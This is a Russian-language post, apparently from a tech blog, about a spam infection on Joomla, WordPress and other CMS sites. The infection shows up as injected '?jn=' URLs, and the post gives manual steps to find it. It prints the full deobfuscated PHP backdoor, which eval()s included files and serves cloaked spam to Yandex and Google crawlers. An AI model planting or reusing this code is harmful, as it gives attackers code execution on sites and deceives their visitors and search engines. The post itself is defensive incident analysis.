Внедрение через URL: www.site.ru/?jn=xxxxxxxx
Буквально на днях столкнулся с новым (*?) вариантом спам-вируса для веб-сайтов. Гугл определяет его как «Внедрение через URL».
Описание
На вашем сайте появляются ссылки которых не было и быть не могло — вы, например, четко знаете структуру сайта и оригинальный вид URL, который отличается от «левых» URL. В частности, в индексе поисковиков появляются ссылки вида:
www.site.ru/?jn=xxxxxxxx
Поиск и устранение
Яндекс-Вебмастер пока не реагирует на них, а вот в инструментах Гугла для вебмастеров выдается предупреждение о возможном взломе сайта. Там же даны рекомендации по поиску. К сожалению они довольно общие и конкретный поиск проблемы занимает время. Антивирусы и он-лайн анализаторы сайтов — результата не дают. Только ручками.
Вариант А: Код не обфусцирован
- Ищем в исходниках кто и как у нас пользует переменную $_GET['jn']
- Далее по коду смотрим кто где гадит (например: \js\swfupload\plugins\jquery\)
Вариант Б: Код обфусцирован
- Ищем каталог с файлами, названия которых идут после "?jn="
- Ищем подозрительные исполняемые файлы типа images/c0nfv.php
- Можно сделать поиск путей где могут быть файлы а-ля "/img/icon/thumb/jquery.php"
- Проверить дату изменения конфигов CMS
- Рекомендуется проверить на наличие (корректность) файлов base.php — это само тело вируса, код обфусцирован
- Проверяем дату jquery.php и сравниваем ее с датой обнаружения вируса по мониторингу инструментов вебмастеров Гугла.
Встречается
- CMS: Joomla, WordPress, DLE, PrestaShop, HostCMS
- Plugins: ImageZoomer, SWFupload, BlockCategories
- Велика вероятность появления практически во всех плагинах, которые используют JQuery и в тех местах, где у админов ручки не дошли до настройки.
Полный код (необфусцированного) зловредного кода под катом.
<?php if(isset($_GET['jn'])){ini_set/**/(strrev("gnitroper_rorre"),0);include "images/c0nfv.php";$uhvuusgp=str_replace('..','',$_GET[$qjkx]);if(is_file($ftdavmbe.'/'.$uhvuusgp)){header('Content-Type: text/html; charset=windows-1251',false);echo eval/**/('?>'.join("",file($ftdavmbe."/$uhvuusgp")).'<?');die;}}if(preg_match("/(yandex|google)/i", $_SERVER['HTTP_USER_AGENT'])){ini_set/**/(strrev("gnitroper_rorre"),0);include "images/c0nfv.php";if(is_file($ftdavmbe."/db.php")){include $ftdavmbe."/db.php";$jxbecpzx=preg_replace("/[0]*$/","", preg_replace("/\.*/","",(string)sprintf('%f', hexdec(sha1($_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'])))));$iwtcrjis=substr($jxbecpzx,20,3);if(substr($iwtcrjis,0,1)==0){do{$x++;$iwtcrjis=substr($jxbecpzx,20+$x,3);}while(substr($iwtcrjis,0,1)==0);}include $ftdavmbe."/".$iwtcrjisy[$iwtcrjis];echo mb_convert_encoding($ohjjpibn[72], 'UTF-8', 'Windows-1251');}}?>
Причины взлома
Вариантов, скорее всего, 3:
- Открытый на запись каталог на сервере;
- Уязвимость в программном обеспечении, которое работает на сайте, как правило это бесплатные CMS (системы управления контентом). Например, если вы используете устаревшую и небезопасную версию;
- Взламывают сторонние плагины на сайте (работающие с JQUERY).
Новый Skype мешает передачи URL-адресов Разработан сервис для разоблачения новостей-«уток» Entensys обеспечила безопасный интернет-доступ для «Республиканской детской больницы» Коми Ростелеком фильтрует трафик по URL, но не через DPI — правда ли дело в экономии? В Гугл поступает более 1 млн запросов на удаление пиратских URL в день В Firefox запретили вирусам менять новую вкладку McAfee получила сертификат ФСТЭК на средство проверки входящего и исходящего веб-трафика Web Gateway Google выпустил антивирус для компьютеров Apple Проверить индексацию сайта в Яндекс.Вебмастере теперь невозможно В Яндекс.Браузере появился каталог расширений и функция блокировки сайтов, занимающихся SMS-мошенничеством
Обратная связь